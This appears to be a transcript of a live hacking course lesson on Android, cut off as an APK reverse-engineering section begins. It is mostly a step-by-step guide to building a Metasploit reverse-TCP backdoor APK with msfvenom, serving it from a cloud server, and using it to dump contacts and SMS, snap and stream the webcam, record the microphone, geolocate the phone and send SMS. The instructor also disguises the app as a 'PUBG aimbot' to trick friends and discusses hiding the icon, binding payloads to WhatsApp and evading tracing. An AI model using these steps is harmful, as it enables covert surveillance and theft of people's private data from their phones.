This conference will now be recorded.
Hi everyone, good morning. So we'll start for today now. So today we'll deal with our hacking mobile platforms and IoT hacking module. So I hope everyone can hear my voice. Okay, so let's begin. So for the beginning part, first part will deal with the hacking mobile platforms module. So let's get started with the practical, and once we are finished with the practical, then we'll come off and discuss the theory part related to that hacking mobile platforms module. So I'll request everyone to start their Kali Linux machines now. So this first part of the practical that we are dealing with right now is for creating a backdoor using our Metasploit for our Android smartphones. Okay, I'm sorry, my screen is not being shared. Okay, so I hope all you guys can see my screen also now. Okay, so this first practical that we are going to do is related to creating backdoors for Android smartphones and all. So creating the backdoor for Android phone using a Metasploit. So basically what we'll do in this case over here is right now, we'll create a executable file, or we can say an installer file, which we'll use in a Android smartphone. So in order to emulate that, what I have done is I have used a utility called BlueStacks that will help me emulate a Android phone in my current system. Otherwise, if you don't have that this BlueStacks installed, you can even use your real Android phone in this case over here. So basically what this APK is going to do is, let's say if you give this APK to a victim and he installs this APK, as soon as he opens or runs that APK, you should get a control over that victim's Android phone. So let's see the steps of how do we create and proceed to like create this APK. So the first step that we need to do is we need to use our Metasploit framework in order to create this. So we'll use our MSF Venom command in order to do that. So we'll issue the command msf venom and we'll use the payload of type android slash metapredator slash reverse underscore TCP. Next part, we'll add our lhost IP to which our victim phone should connect back. So in this case over here, the lhost IP should be your own system's IP address. So in order to find out your own system's IP address, you can just do a control shift T, run ifconfig command and see your IP address. So like I can see my IP address in my network currently is 1.8. So I'll be using my IP as 1.8. In your case, please use this lhost IP as whatever your lhost IP for your Kali system is. So please make sure that you're using your own Kali Linux as IP address in this lhost part. So after the lhost, we'll assign a L port value. That can be anything. I'll use the port value 4433. Next, we'll use a capital R, create it as a runtime executable, and we'll out this content using this out symbol, and then give a name to this APK. So I'll give it any name, like let's say testing.apk. So we'll issue this command msf venom -p, use the payload of type Android metapredator reverse TCP to make the victim connect back to this lhost. Whatever lhost we specify is going to be of the attacker's machine, as in where he's running his Kali Linux, a L port value where the victim can come and connect back. That R stands for created as a runtime executable. as in a collection of a zip archive of dex files, which we'll refer to later on what these dex files are and why is it given that R formatting, and we'll out all of this content of payload into a APK file that we'll name as testing.apk. So that name testing.apk, you can assign any name over there. It doesn't matter. So if you get any error while running this command, please like put your error in the chat. So I hope everyone will create the APK like this: msf venom-p, the payload name, lhost, lport, r outed into this testing.apk, the APK name. So once this is done, please let me know in the chat. So I hope all are done with this by now. Everyone has created this APK file. So as we have our APK ready on our system, now in order to give it to our victim, what we need to do is we need to host it on our system on our web server directory or web server hosting directory. So what we'll do is we'll simply copy it to our Apache directory. So after creating the APK, please copy this APK file with the cp command, cp that APK name to the location var www.html.
Sorry, sorry to
Yeah,
interrupt. I'm middle. Give us 2 minutes, please, to complete this.
yeah, sure.
Hello.
Yeah,
Yeah. So one doubt here is whatever we are using is a local IP, right? So the
yeah.
machine should be in the local network. Huh?
Yeah, the victim and the attacker right now in the current scenario are both in the same network. So after I do this, I'll show you the practical of how I can get this done with a person who's sitting on some other network as well. So I'll use that Amazon EC2 instance like I used yesterday for that.
Okay.
Yeah. Okay, so once you're done, once all of you are done, please let me know in the chat. I'll continue.
And this attack will not be detected in the mobile phone. What are
Will
operating
not be
system operations?
as in, I didn't get the question totally.
No. When an application we are transferring it to a victim's mobile.
Rooted mobile or
And
non-rooted mobile?
so see, what I'm thinking is now we have to install this application in the victim's mobile, right?
Yes.
So for that we need to access the phone directly.
Now, the thing is, you have to like come up with some kind of social engineering scenario, as in wherein you can ask your victim to install this APK. Until unless he does not install this, we can't get the access.
Okay. And yeah, I saw some places like some antiviruses or kind of stuff will be detecting the applications
Yeah,
which are running.
yeah, that happens. Yes. Okay, so I hope this part is done until here. So next, after copying this APK into that directory, our hosting directory, Next, we'll initiate our Apache service using service Apache to start command. Then we'll load our Metasploit framework. So in order to load our Metasploit framework, in order to run the handler, what we need to do is, first of all, we need to initiate our Postgres service. So we'll issue our service PostgreSQL start command. Next, we'll run our MSF console in quiet mode over here. Okay, so once this happens, now what we'll do next is we'll use our multi-handler to accept connections on behalf of this payload containing APK. So we'll use our multi-handler, and in our multi-handler, we'll set the same payload which we use while creating our APK. That will be the same. And write metapreter reverse TCP for the payload name. Next, we'll set the same lhost lport values what we use in the command. So I'll use my 192.168.1.8 IP for lhost and 4433 for lport value. So once all of this is done, I'll run my exploit as a background job. So these are the next set of steps that we'll do. So once this happens, now what should happen is if victim goes and accesses my IP, he should basically be served with that APK file, which if he installs and runs on his Android phone, should give me the access to his mobile, this Android smartphone remotely. So please make sure when you give these commands, you replace the lhost and lport values with whatever you chose while giving the MSF venom command. As in the lhost IP should be your own Kali Linux's IP address and lport value should be the same what you gave in the MSF venom command. So once this part is done, please let me know. User share Ruby gems. It's a warning. What you're getting. So probably you can ignore that. Somo. Okay, so these are like the total set of commands that we are running. So once this happens, now the next part that needs to be done is we need to copy this, like get this APK on the victim's phone somehow by using social engineering technique or something. So I'll be using BlueStacks on my system. So in your case, if you don't have this BlueStacks tool, what you can do is you can simply access your Kali Linux's IP address in your own, you can say actual Android phone that you have. Otherwise, you can just download this BlueStacks later on to check the same. So this BlueStacks basically is the Android emulator. So what I'm going to do next is I'm going to go and download this APK on this Android phone and run it there. Okay, so my Android emulator is up and running. So now what I need to do is I need to simply go on the browser of my Android phone and access my Kali Linux IP address. So I'll go to the IP 192.168.1.8. That is my Kali Linux's IP address. Okay, so I'm getting this default page, so I'll probably need to remove that index file. So let me do that. If you get this, you can also do the same set, like same command. Hopefully you won't get, because previously also you have used the same commands and all. So remove from var www.html the index files that we have. Now it should not give me the error. So let me refresh this page. Okay, so now you can see that I have been served with this APK file, which I can download and install on this emulated Android phone that I have. So I'll just download this APK file. Gives me a warning. The newer version of Android phones include a thing called Play Protect in order to safeguard you from all these harms which this malicious APKs which we download and install from outside other than Play Store do. So once this APK is downloaded, if I simply go and install this, I should get this warning. Main activity, do you want to install this application? And I see this set of permissions that this application might use, as in it may involve modifying my system settings, take pictures and videos and all. Most of us many a times don't care about these permissions, whatever Android applications we install take. So I'll simply go ahead and install this APK. So now I can see that the APK that I'm installing is going to be with the name main activity. So when this APK is installed, I can simply go and look for the APK with the name. So here's this main activity. So the thing is, as soon as I once click on and execute this main activity application, as soon as I do that, I should get this session, metadata session opened on my Kali Linux machine where I have my handler running. So once this happens, if I issue the sessions command, I can see that I have a metadata session from that Android host, which I am running as a emulated device. So one more thing to keep in mind is for some newer versions of your Android phones, you might need to go into Play Store and disable one setting called Play Protect. So this Play Protect setting, if you open your Google Play Store, you might find in this drop down at this place over here called Play Protect. So if your Android phone does not allow you to install APK from outside, you need to, or you might need to go and check this Play Protect setting in your Play Store. So for that, you might need to open your Play Store and need to go into this drop down section where you will find this Play Protect, and you'll need to disable this Play Protect so that you can simply install application from outside. So sometimes you might get the warning, sometimes you might not get the warning. Still, if you get the warning, you can simply disable this. If you disable this, then you won't get the error at all. Okay, so once I've gotten my metadata session, now comes the interesting part where I can run some commands against this emulated Android device and see whatever things it can do. So let's say if I need to interact with this metadata session, I need to have a look at the ID number. So I can see that my current metadata session is with the ID 1. So if I simply issue the command sessions I-i with 1, as in sessions interact with the metadata session 1, it lets me interact with that session one. So once I'm inside the metadata, I can give these set of commands and do some interesting tasks. Like first of all, I can inquire about sysinfo. Then I can use this command check underscore root to see whether that device is rooted or not. Then I can simply do a geolocate to find out where the coordinates of that phone are to the closest proximity, not the exact location. So sysinfo, check route, geolocate. Then we can have features like dump underscore call log, dump underscore SMS, and dump underscore contacts. Next, we can choose webcam commands. So we can choose webcam underscore list, webcam underscore snap, and webcam underscore stream commands to make use of the webcam on that remote machine. We can even do recording from the microphone of that. So with this record mic, you can use a duration of some specified seconds. Like if I say record mic with a -D5, it will record the microphone near that Android device for the duration of 5 seconds now. So these are like some interesting commands that you can run. Many of these commands might not work on your mobile phone. So please refrain from like checking key if some commands run or some command doesn't run, then something is working, something is not working. Because based on your current Android version, some commands might not work properly. So you can run all these different commands inside that better session. If you want to see some more commands that you can run, you can always go inside the better session and give a question mark to get the help related to the other different commands which you can see, run inside that. There's one more command that you can use, that is send underscore SMS to a -D destination number. Like let's say for example 98765432210 with a -D text of some type, something like this. So what this send SMS command will do is it will send a SMS from that victim's phone to this destination number with this text, as in whatever you print inside that double inverted commas. So you can check by running these commands one by one, some of which might work, some of which might not work on your Android device. Okay, so I hope all of you, like most of you would have noted these commands. So now what I'll do is I'll demonstrate running these commands one by one. What happens when I run these commands on my better session. So I'll begin with my sysinfo command. When I give my sysinfo command, can you please ping the utility name to be installed? I didn't get your question, sir.
So that particular mobile app which you had just shared, no, that particular thing, the utility you said that you can install it later. So what is the utility name?
Achha, this Android, this emulator you're talking
Yes,
about.
yes,
Okay,
yes,
this is
emulator.
in BlueStacks.
BlueStacks. Okay,
BlueStacks. This is the BlueStacks.
sure.
So it comes available for like your Windows and Mac. I don't know about Linux. I can't confirm. I need to check their website. So this is like the Android
Okay,
emulator that I use.
okay.
Yeah. Okay. So once I issue my sysinfo command, I can see that the emulated Android device which I have is running Android version 7 with this kernel architecture 4995. Next, if I use my check root command, that will tell me whether the Android device is rooted or not. So it says the emulated Android device is not a rooted Android device. So next, if I issue a geolocate command, the thing is if I have the location settings enabled on my emulated Android device, like let's say, let's go to the drop down. So there is my setting. So the thing is, if I have my geolocation permissions enabled, this location settings enabled, which is currently on, what my geolocate command should do is it should print out the coordinates where my emulated Android device is running right now, or to the closest proximity. So if I run the geolocate command, you can see it printed this coordinates for me. So how do I find where this mobile is with the coordinates is? I can simply open maps.google.com and paste this coordinates over there. So let me do that now. So if I simply go to maps.google.com and paste this coordinates next to each other. So with this, I might be able to pinpoint the location where my Android device might be right now. So not the exact location, but it might be to a closest proximity. So somewhere around here, I have my Android device being run or emulated. So it's very close to where I live. So these are like the coordinates of that location. So next, after this geolocate command, what I can do is I can even make use of these commands that are your dump, call log, SMS, and contacts. So basically, as I'm running an emulated Android device, the thing is I don't have any SMS messages or any call log. So if I simply do a dump underscore call log, I can see that there are no call log entries to dump. If I do a dump underscore SMS, I can see there are again no SMS entries to dump. But many a times we have the thing of syncing our contacts to our Google account. So if I do a dump underscore contacts, the thing is whatever contacts, if it can fetch from that synced list, it might print onto your machine. So if I do dump underscore contacts, you can see it has fetched 6 contacts into the list and it has saved this into the contacts dump list. So basically this contacts dump will be created in my root users home directory. So if I simply go to my places home or current logged in users home directory, I should be able to see this contacts dump file. If I simply go and open this contacts dump file, you should be able to see what contacts it fetched and dumped from my Android phone. You can see this dumped contact list from my Android phone, which it got. So there might be sometimes some synced contacts in your Google account, which it might print on your screen over here like this. So you can see the time and everything. So this is about that dump, contact, call log, and SMS commands. So once this dump, call log, contacts, and SMS is done, what we can do further is we can even make use of the webcam commands. So if I simply issue a command webcam underscore list, my metadata my metadata tries to identify how many cameras are attached to that emulated Android device. So right now, even if it's an emulated Android device, that emulated Android device still has access to my local machine's camera, as you can see with this name back camera. So the thing is, what I need to do from this is I need to note down the index number. So basically right now I can see that the index number of my back camera is 1. So hopefully the front camera, if it was there, would have been 2. So now what I can do is I can simply say webcam underscore snap using the index number, as in this index number 1 or 2 for front cam or back cam to take a pic. So if I simply say webcam underscore snap, take a pic with -i1, as in the camera at index 1, what should happen is this webcam should basically take a snapshot or a click with that camera at that index. So once I do this, now what should happen is it should take a frame and it should save it in my system. So now you can see that it has taken a snapshot from my camera, and this is like me in my home right now. So in the same way, if you issue a command webcam underscore stream with that index number of camera, it will even start streaming from that webcam. So it might take a little while. Okay, so now you can see that it has started streaming using that index of that camera as well. So this webcam underscore stream will help you stream from that webcam as well. So these are the webcam snap, webcam stream commands. Next, we can even have our record underscore mic commands with a hyphen duration. Let's say if I say 5 seconds, so whatever I say for 5 seconds near that webcam, oh sorry, not webcam, the microphone should be saved. So this recording I can see is saved in the location root with this RMN name. If I simply go to my places home and check this rmn.file, if I play this, it should play that recorded sound. For 5 seconds near that webcam. So you can see it played something. So this is the way that I can even record the conversations that are happening near that microphone of that webcam. So record mic is done. Now the last one is send underscore SMS. So if I add this send underscore SMS and I give some random number like 98765432210, whatever number I give and whatever text I put. So what my Android phone should do is it should send a SMS without even like asking for the user's consent for the SMS to be sent from that phone. So as right now I don't have a SIM card inserted in that phone of mine, it won't be able to send this SMS. But if it's a real phone, then you'll be able to see that SMS what's being sent. So you can see I got the timeout for that send SMS commands. But if you tried this on your real Android phone, hopefully it would have sent that SMS by now. So these are some features which this APK might have. So after a while, we'll see why it's having all these features and all. So one doubt that most of us will have in our minds is in the current scenario, our attacker and victim both were in the same network. So I guess Chetan has a doubt. Connection with my phone is losing after sometimes when session gets closed. What could be the reason? It can be anything from your network to your phone security. It can be anything, Chetan. Okay, so once all of these commands are done, now what we can say is the scenario right now is something like our attacker and victim both being the part of the same networks. The IP we use is a local IP. Will it be possible to get connected through internet also? Yeah, that's what I'm going to show next. So the thing is, many of us might have it out many times that let's say if my victim is sitting in Hyderabad and I want to give this APK to him. So let's say that if you're ready with the handler thing and everything, the case might be you might need to enable port forwarding on your current system based on your ISP and everything, which might be a headache kind of a thing. So in these kind of scenarios, like yesterday when we had that MSF Venom create that MSI for that alpha hacker system yesterday, I don't know whose system it was. In the same way, what I can do is again I can use that Amazon EC2 to create the APK in same way and serve it to my victim as well. So now I'm going to demonstrate that part. So the setup part also is going to be a little common to what it was yesterday. So basically, I'll be using the shell, the SSH shell from my EC2 hosted Kali Linux like I used yesterday. So for a while, I'm going to go out of my this Kali Linux hosted on my local system. Now I'm going to close my emulated BlueStacks and everything. So let me go into my EC2 account and spin up a Kali VM. So let me run my Chrome and log in into my AWS account. So if you haven't created this by now, I strongly recommend most of you to use, because the first year is free of cost, so there's like no charge that will be incurred, and later on if you want to cancel the subscription, you can do that as well. So if you simply do a search for AWS console, you'll get the login prompt for this AWS management console. So I'll log back in into my account and spin up a Kali VM. I'm sorry. So I'll go and access my EC2 services to spin up that Kali VM like I did yesterday. So after logging in into my Amazon EC2 account, I'll simply go select the launch instance button, go to launch an instance. So in the launch instance, I'll search for with the name Kali Linux. I can see in AWS Marketplace, I have my Kali Linux. I'll select this. So they give me the pricing for everything. So I'll simply click on continue. Now among those instance types, whichever I like or whichever I want, I can use. So I'll just go with whatever default is chosen. I don't care. I can see it's going to have a 4 GB RAM and how much storage, I don't know. 25 GB, yeah, 25 GB SSD. Okay, so this might be good. Okay, so now I need to choose a key pair. So yesterday I created a key pair which I deleted hopefully. So basically I'll be creating a new key pair. Create a new key pair. Let's say for Android demo, I'll say Android demo. I'll download this key pair on my machine and launch my instance. Okay, so meanwhile my instance is launching and everything. In that time, I'll go and set up the security group settings like yesterday. So security group settings which I'll need today will be again one HTTP port open on my EC2 instance so that people can come and access my public IP where my EC2 Kali machine is hosted. Second, a L port value or some range of L port values which I can choose while giving my MSF Venom command so that if the victim hopefully installs and executes my APK, when he sends a connection back to my public IP, then that connection should be forwarded to my internal IP. So let me get that part done. I'll go into the security groups section under this network and security, and I'll create a new security group. So I'll click on this create a new security group and name it something like Android demo again. For connect back, I'll add a rule. The inbound rule will be first of all for HTTP traffic. So I'll select the HTTP port 80 chosen by default. Source, it can be accessible from anywhere. So make sure you always keep in mind that this anywhere part should be selected in source. So HTTP port for my machine will be accessible from anywhere. I'll add one more rule. The custom TCP port from the range, again, let's say like yesterday, 4000 to 5000. I can choose any port within this range. Again, accessible from anywhere means anyone should be able to connect to these values without boot forwarding being set up on my part because my security group rule is enabling this thing. So once I've created these two rules, I can simply click on create the security group. So once the security group rule has been created, I can go back to my dashboard, select my running instance. That is this instance which I just ran, T2 medium one, and do a right click on this, select the networking part to change the security groups for this. So I'll simply do a right click, networking, change the security groups, and I'll select this Android demo name and this default one as well. So once I have my security groups chosen, I can assign the security groups to my currently being run instance. So now the only thing that remains is I need to access or connect to my public IP at which my Amazon EC2 instance has run and do a SSH connection to it to set up that APK things and everything. So I'll copy my public IP to my clipboard and I'll run my shell over here. Okay, so now let me cd into my downloads directory, do ls-l for all PEM files that I have, basically all PEM files that I downloaded. So you can see this Android demo.pem downloaded a while ago. So I'll do a SSH using -i, this key pair with the name Android demo with the account name ec2-user at the rate the public IP of that instance, that is this 13.233.80.185. Once I hit enter on this, it asks me for that accepting of the keys. I'll say yes. It says unprotected private key file because it has too much open set of permission. It's RWRR, which I need to change into RW nothing nothing, as in I need to do a chmod 600 on this Android demo.pem file so that I can connect easily. So if I now do a ls-l on my pem file, you might see that the permission which was RWRR earlier has now changed to RW with nothing, nothing, nothing. So 600 basically signifies that 6 is for RW as in 4 plus 2 if you remember the first class. So that's why 600. So once this part is done, now I can simply do that SSH command. So I'll SSH using -i this private key file, the key file named Android demo.pem with the account name EC2 user at the machine hosted on this public IP. IP is 13.233.80.185. So as soon as I do that, I should be able to get access or get logged in into my Amazon EC2 instance. So once this part is done, now first thing I'll do is I'll sudo switch user to root account, which I did, and I'll now cd as in go into root users home directory. So now, as we want to create that APK file first, we'll issue our msfnum command with the same way that I did earlier for our local practical thing. So I'll say msfnum, use the payload of Android metapreter on reverse TCP. Ask it to connect back to this lhost. Now this time lhost can be my public IP because I have enabled the security group setting for accepting connections between the port range 4000 to 5000. So I can choose any port between 4000 to 5000 over here. So I'm choosing this 4444 port. So make sure whatever L port you use should be in that open range, that security group open port range. Again, with a capital R, out this into the /var www HTML location so that I don't need to run that copy command later on. So once this is created, now I'll make it something interesting for the name. So I'll name it as PUBG aimbot. So many of my friends play PUBG and they look for this aimbot thing. So I'll tell them that for free of cost, this PUBG aimbot is available on this public IP. So you can go download and install this and run this APK before you play your PUBG. So this way they might run this whenever they are playing PUBG. So whatever the social engineering thing stories for later. Basically, this should create this PUBG aimbot on my machine instance over there. What will be the syntax in case of Windows system? I mean SSH. Okay, you'll need to use a utility called putty, sir. You can't directly use the SSH prompt terminal from your command prompt. So you need to use a utility called putty. So once we have our this thing APK created, so now let me issue my service Apache to start command and see whether on my public IP I have this APK available or not. So let me go and access my public IP. So let me check whether on my public IP I have that APK available or not. Okay, I'm having the default page. So I'll simply need to remove the index file. I'll issue rm from var www.html the index files. So the index file is removed now. So now if I refresh my page, now you can see that the PUBG aimbot file is available. That APK file which I need to serve to my victim is available. So basically I can simply go and tell in any WhatsApp group or send a PM to my friend who plays PUBG a lot that simply go and download this APK from this IP. This PUBG aimbot is freely available over there. So once he downloads and installs this APK, I should have access to his Android phone remotely. Okay, so once this serving of APK part is done, now what I need to do is, let's say if someone downloads and installs this, I need to have access to his phone. So I need to run a handler on behalf of this. So for that, I'll need to do my service PostgreSQL start first. So I'll do my service PostgreSQL start command. Next, as it's the first run of Metasploit on my machine, I'll do a MSFDB init so that the Metasploit database MSFDB in that PostgreSDB gets initialized. So I don't need to do this for an old instance, but for a new freshly run instance like this one, I need to always run this MSFDB init. Otherwise, I'll get a error when I run my MSF console commands. So now I'll say MSF console run in quiet mode with a -q. Okay, so once this part is done, now I can use the same set of commands which I used previously in my Kali machine. Like in the same way, I did this part of setting up the handler with multi-handler set payload lhost and lport. The thing is lhost and lport which I'll change will be to my public IP and the same port which I use in my msfnum command. So now I'll use the multi-handler utility inside my Metasploit. I'll set the payload as Android metapreter reverse TCP so that I can accept connections on behalf of this payload because the APK I generated was using this same payload. Next, I'll set the lhost value. So I'll set the lhost IP directly to my public IP because anyways, with my security group setting, the connection if comes to that port 4444 will be forwarded to my internal IP, internal running, whatever 172.IP is. My security group setting will automatically, you can say, forward this connection to my internal IP. So set lhost to this public IP, set lport. This we need to be very careful. We need to choose that port value which we opened in our security group setting, and I chose the range of ports between 4000 to 5000, so I could have used any port, but I basically chose this default L port value 4444, which our Metasploit mostly or usually uses. So I set the L port value to the same 4444. Once done, now I'll run my exploit as a -j background job. So once this part is done, now if I check the output of jobs command, you can see my currently run Android, this Kali instance is ready to accept connections on behalf of any Android phone who goes to my public IP, downloads and installs that APK. So can anyone try to do that so that I can run those sysinfo commands and all for your Android phone? So this is the public IP that you need to go and download the APK from. You can uninstall the APK later, and anyways, I'm going to delete this Kali instance, so no need to worry about me spying on your phone later on. So if someone can go to my public IP and download that APK to install it on your phone. Otherwise, I'll need to do it on that emulated Android again. Okay, someone accessing this? You can be on your data connection as well. There's no need to be connected to your home Wi-Fi network or anything. So did someone access this APK?
Yes, I have installed it.
Yeah, you have to like run it once as well. Okay, yeah. So now you can see that I have already gotten a session open from someone's phone. So let's type sessions and see. We have a Android session from this metadata. So you can see this IPv6 address. So hopefully it's from the data connection, maybe. Okay, so it's IPv6 local IP. So I'll do a sessions -I with one. So I'm interacting that metadata session one. So first of all, I'll begin with sysinfo. So this session died already because connection terminated or something, maybe. Exploit another job again. Maybe the session died because of some network issue or something. Yeah, I have 3, 4 more sessions. Okay, so let's take sessions. I have these sessions. Let me interact with the most latest one. Sessions interact with, let's say, ID 4. And let me run the sysinfo command. Oh, it's whatever I'm doing, it's closing. Interact with 3 sysinfo. And as soon as I give any command, it closes the sessions. Anyway, so can someone else also try to do this? I don't know. There might be some problem with the network connection or something. I have this Java Android one. So Java Android might not be so interesting. We'll come to the reason for that in a while. Let's wait if it gets converted into a DEX like this Dalvik Android one. Still a Java Android, so let's try to interact with 7. See the list of available commands. We don't have any command available in this. That's why we can't run it. So let's background this and some more sessions. I only have one. So let me test it on my own BlueStacks only. Okay, so I'll simply go and access it on my own BlueStacks. So anyways, if anyone downloaded this APK, please make sure you have uninstalled this as well. Okay, so it's ready. So let me uninstall the previous installation. And then download the newer APK. So my APK will be available on public IP 13.233.80.185. 13.233. 13.233. 80. 185. Okay, so you can see that again, like my local Kali Linux, it's having a PUBG APK available at this public IP, and this public IP can be accessed from anyone who's connected to internet. So there's no worry if he is in my network or not. So I'll download the APK now. I'll open, install this APK on my phone. So once installed, if I simply click on open, it should send a connection to my handler over here. So let's click on this open. It's done. Main activity is being run. Now you can see that I have a sending stage. I type sessions. Still don't have a session. Let's wait for a while. Sessions. Java Android from this one. Let's see sessions. Don't have it yet. 8 open. You can see I have a session 8 open. So if I simply type sessions now, you can see I have a session from this localhost at this public IP of mine. Public IP of my router now. If I simply do a sessions interact with that session number 8, start sysinfo, again same everything. So the thing is, if I simply run those webcam commands and everything, the thing is, as it's being run on a Kali hosted remotely, these all snapshots and everything will be hosted in that or saved in that remote Kali IP address. If I simply say a webcam snap with a -i1, it should take a snapshot, but I should not be able to see it because as the thing is, I'm using this as a SSH connection, as in I'm having access to this as a SSH connection. But you can basically see an image got saved and everything. So in the same way, if I do a record underscore mic for whatever duration, let's say, so the thing is it will record, but it will not be like audible to me to the SSH interface. So what I can do in this case over here is I can simply say exit out of this and close my handler as well. So if I do ls-l now, you can see that I have my JPG and WAV file over here. So what if I simply copy all stuff from here to my var www HTML location? Once I do that, if I simply go and refresh, you'll be able to see I have this JPG image of mine and I have this WAV file over here as well. So in this way, I can have access to that things and all, which the camera might be storing or recording and everything. So this is the way this thing, this APK session might work for even someone who's on a remote connection or something. Sure. So this is the part of how we can do this for someone who's outside our network as well. So simply let me run delete this instance as well. So I'll terminate this. So this APK files, image files, and everything might not be available. Okay, so once it's terminated, now nobody should be able to access. So as in now, if someone goes and tries to access that public IP of mine, they should get connected to nothing because the instance on which it was all running and being set up has been terminated now because my machine instance has stopped running. So I hope this was clear to everyone. So if there's any doubt or anything related to this, practically you can just ask it in the chat. So next, for the next part, we'll start with reverse engineering this malicious APK and understanding some basic things related to safeguarding our Android and all.
Yeah, so I have some doubts here.
Yes.
So, like, how can we hide the icon of the application? Is there any possibility for
To
that?
hide the icon of the application, there are several utilities known as these ones. Let me show you. There's one option in that metadata session as well to hide the icon. And otherwise, there's like these utilities called AndroRat and others, which you can use as a basic RAT or remote access Trojan generator for this APK. So one which I know of is this AndroRat. So the thing is, they are all compiled in Java, and you need to like work with them. So one is this AndroRat, then there's one more called Droid Jack, I guess. Yeah, Droid Jack. So these two are the ones that you can use in order to perform that part.
So, these are like to bind the kind of Trojan to the any existing APK and send it to the victim, right?
Facebook or WhatsApp, you can bind them to this using these tools and all. Yes, exactly.
Do we have this in our sessions?
No.
Okay. So that's fine. The next doubt is uh, when we do this with respect to public IP, now we are taking any AWS instance or somewhere or something like that. Now, if we do it with a public net, like local network, now I'll be having a router in the place of public IP.
Okay.
So there it will not be a machine, no. So how can I monitor that? Like I need to get any public IP from the ISP provider or something.
Like let's say in my case or my current scenario, if I simply check what my public IP is, my public IP is this one. This 100, 200, 106, 200, whatever. So what I need to do is I need to get a port forwarding enabled from my ISP for this. So once I have my port forwarding enabled, I need to go and set up that forwarded port over here. So my router gateway, I need to go and forward that.
So okay, in that case, whatever request come to that port will be forwarded to only that particular machine.
Yes, exactly.
So in that AWS instance, we gave a we gave a limit of this one, no? Ports, whatever comes that has to be routed to this particular machine, like that we did.
I didn't get the question.
So in the AWS machine, whatever we have created right now, in that you gave a range of ports. So telling
Yeah,
like 4,000, 5,000.
it can be a single port as well.
Like what? And if the hacker opens this multi-thread, multi-handler, and he waits for the session to start from the victim's end.
Yes.
And if the hacker system gets restarted,
like
so if
me connecting that S6 session.
yeah, so you are running a multi-handler.
Yeah.
Now, while you are running, you're waiting for the victim to install that app and run it.
Yeah.
What happens if you restart your machine, or assume like one more case, if the victim is using, like we are able to access the victim's mobile, and there was a case where I have restarted the machine, like the hacker has restarted the machine. Will the same
Like
system get
your own machine or EC2 instance?
my own machine?
Okay, so in that case, you'll need to get the handler and see if the session is still persistent on that EC2 instance. You need to like take control of that process.
So it's like once the system is restarted, that multi-handler will close and again we have to start and
Yeah,
again
you lose the
session has to
connection.
be established.
You lose the connection. Exactly. Yes.
So that means like the victim has to open the app multiple times.
Yeah, he'll need to like install or click on that application again to generate a session for you.
Okay. And how about the same process for iOS?
iOS, you don't have this kind of way because iOS you can't create an IPA file like this and install it separately until unless the iPhone is jailbroken.
Okay, until and unless it's jailbroken, we cannot do that.
No.
Right? And here, how can we possibly what to say hide our identity? Like whatever machines IP and all we give, it will be of our own machines, like public IPs. If I try to
Mhm.
take any, if I try to take any VPN provider or anyone, anyhow that can be tracked out.
Yes.
So
So
there is no possible.
use a VPN to connect to that instance and like get the instance on someone else's name.
But that person will be caught. No? He should be
Yeah. There should be some track left somewhere, right?
like we need to have an escape code. That's it. No, no other way.
No. No other way.
Okay. And how can we identify if someone is hacking our phone?
How can you identify if someone is hacking your phone? There are different utilities. One is this one. You can install this ZIPS tool from Zimperium on your phone. It's a good application that I suggest keeping on Android phones. So this video I had saved for last. So anyways, this video I'll play at the very last and show you what this ZIPS can do for you. Like how it can safeguard your phone and everything. Fine?
Okay.
Yeah.
And I saw some applications over the internet which provides us this kind of services. Like they provide an APK, like some spy applications, MSpy, Truth Spy, etc., etc. Can you suggest us any applications which we can work with?
I didn't get the question exactly.
No, we have some applications over the internet which provide some applications like this, like Truth Spy or MSpy, something like that.
Ha, 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 ha. So those are like basically your
So
tracking kind of things, right?
they also provide the same thing. No, I just work with 3 or 4 applications. Do you have any personal applications which can be suggested?
No personal favorite. I don't go for that scenario. No
Okay,
personal.
fine then.
Yeah.
Yeah.
Okay, so now let's see how we can reverse engineer all these APK things around. So as we saw that our application while being installed had different set of applications and everything. So now let's come to the reverse engineering part of these kind of applications or Android applications. So let's exit out of our handler thing. Let's get back at our root at Kali prompt. So in case you're inside your Metasploit handler or something, please exit out of it and be back at your root at Kali or Kali at Kali prompt and do ls-l so that you can see this APK in that current working directory wherever you are. So once this part is done, now let's see the part of how to reverse engineer Android applications. So for reverse engineering this Android applications, we need to have some set of tools installed on our system. Those are these APK tool. One is your D2J Dex2Jar or Dex2Jar, and third is your JD-GUI. So in order to install these, let me put down the notes properly. So you can simply run a command apt install apk tool, then dex to jar and jd hyphen GUI with a hyphen y so that these tools can get installed on your Kali Linux machine. So I'll suggest everyone to run these three commands first of all and install these set of tools so that we can work with that part of learning how do we reverse engineer these Android applications. So please give this set of commands apt install apk tool dex to jar jd GUI with a hyphen y tag in your terminal prompt. So you can just open a new terminal prompt and simply issue this command apt install apk tool dex to jar and jd GUI. So this might take a while, so let it install on your machine. This is the command apt install apk tool dex to jar jd hyphen GUI with small hyphen y. So if someone is getting any error while running this command, please let me know in the chat. And once it's done for everyone, please let me know in the chat as well. So is anyone getting any error while running any of this command or installing these tools? So once the installation finishes, please let me know in chat so that I can continue. It's, I hope, almost done for me. Yeah, it's done for me. Okay, so meanwhile this is installing, let me put down some notes for you. So basically this will be like the APK that we install on our Okay, so this is the thing. The APKs that we install on our Android phones, so these things are basically your collection of different Java archive packages that are compiled as a Dalvik executable or set of DEX files. So in order to reverse engineer those APK files, what we need to do is, first of all, we need to unzip that content from the APKs or Android application packages. So once we unzip them, then we can get the output as these DEX files, which we call or refer to as Dalvik executables. So next, after we get this Dalvik executables, what we need to do is we need to use different open source utilities like Dextuja. There are some other alternatives available, which can help us convert those Dalvik executable or DEX files to the closest Java source code. So once we have it as the closest Java source code, where we have it as a jar file, what we need to do is we need to use some kind of explorer, so with which we can work and check that actual source code. So in order to see that Java source code, what we do is we use this open source utilities like JDGUI Explorer and all in order to view the code and work with it, so that we can use some kind of standards like our OAS Prop 10 for mobile security platforms in order to look for the security vulnerabilities or different types of security vulnerabilities in that APK, whatever we are working with. So can just everyone confirm in the chat that you have these set of tools installed on your system by now? If anyone's still getting it installed, I'll wait for a while. Otherwise, we'll start with that part. Okay, so people say that they have installed it already. So these tools are installed for everyone. Okay. So now everyone please issue this command file and confirm that whatever APK you created, first of all, if you issue the file command on it, you get the output something similar to this, that the file command tells you that the APK file which you have is basically a collection of a zip archive data, something like this. So if it's not giving you this output, maybe you're not in the correct directory where you have the APK. So as we can see over here, as our file command tells us that this APK is basically a collection of the zip archive data. Now what we are going to do next is, in order to extract the DEX from the zip, we will use this command. So the command that we'll use will be apk tool with a D. Sorry, no extraction. First of all, we need to unzip it, right? Sorry. So first of all, we unzip the content from the APK using the unzip 